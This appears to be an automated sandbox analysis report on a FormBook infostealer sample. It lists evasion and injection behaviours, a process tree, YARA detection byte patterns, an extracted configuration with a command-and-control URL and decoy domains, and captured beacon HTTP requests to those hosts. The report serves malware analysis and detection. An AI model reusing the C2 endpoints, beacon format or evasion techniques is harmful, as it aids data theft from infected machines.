Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 1cec9342_by_Libranalysis

Overview

General Information

Sample Name:1cec9342_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:412599
MD5:1cec9342ac2c1f91201df672382672f2
SHA1:968ab56e042035a593279775308298cfdcdc0af7
SHA256:a1783d0a9f787d819b960b55c8ebfb227459bcb7daab55996720e8279751736f
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 1cec9342_by_Libranalysis.exe (PID: 6800 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
    • 1cec9342_by_Libranalysis.exe (PID: 6840 cmdline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: 1CEC9342AC2C1F91201DF672382672F2)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5876 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dllMetadefender: Detection: 26%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dllReversingLabs: Detection: 58%
          Multi AV Scanner detection for submitted fileShow sources
          Source: 1cec9342_by_Libranalysis.exeVirustotal: Detection: 54%Perma Link
          Source: 1cec9342_by_Libranalysis.exeMetadefender: Detection: 20%Perma Link
          Source: 1cec9342_by_Libranalysis.exeReversingLabs: Detection: 82%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 1cec9342_by_Libranalysis.exeJoe Sandbox ML: detected
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1cec9342_by_Libranalysis.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nobleandmarble.com/or4i/
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1Host: www.healshameyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.rogersbeefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1Host: www.nowhealthdays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.ikeberto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1Host: www.directflence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.mmgenius.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1Host: www.rainboxs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.nobleandmarble.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.safegrinder.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1Host: www.tecquestrian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1Host: www.cuntrera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1Host: www.changethecompany.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.16.197.4 3.16.197.4
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=br7cblkv9ontd/SiGgT+XZDl5pRbJS2ewUI6yLIzIbkbVffvtcdgNY0Hgbt3ntXhEXSG HTTP/1.1Host: www.healshameyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=iur2w+iIhsR226mwIbytM77gwZtRr9g6xSmsh16YEl1oNNyvhmb6qr2bTjtOXqdr6kbB&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.rogersbeefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1Host: www.nowhealthdays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.ikeberto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1Host: www.directflence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.mmgenius.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1Host: www.rainboxs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.nobleandmarble.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.safegrinder.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1Host: www.tecquestrian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?HFQDEL_8=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QI8r/8KBX8&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1Host: www.cuntrera.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1Host: www.changethecompany.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.healshameyoga.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 12 May 2021 18:03:26 GMTserver: Apacheaccept-ranges: bytestransfer-encoding: chunkedcontent-type: text/htmlconnection: closeData Raw: 32 31 36 38 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 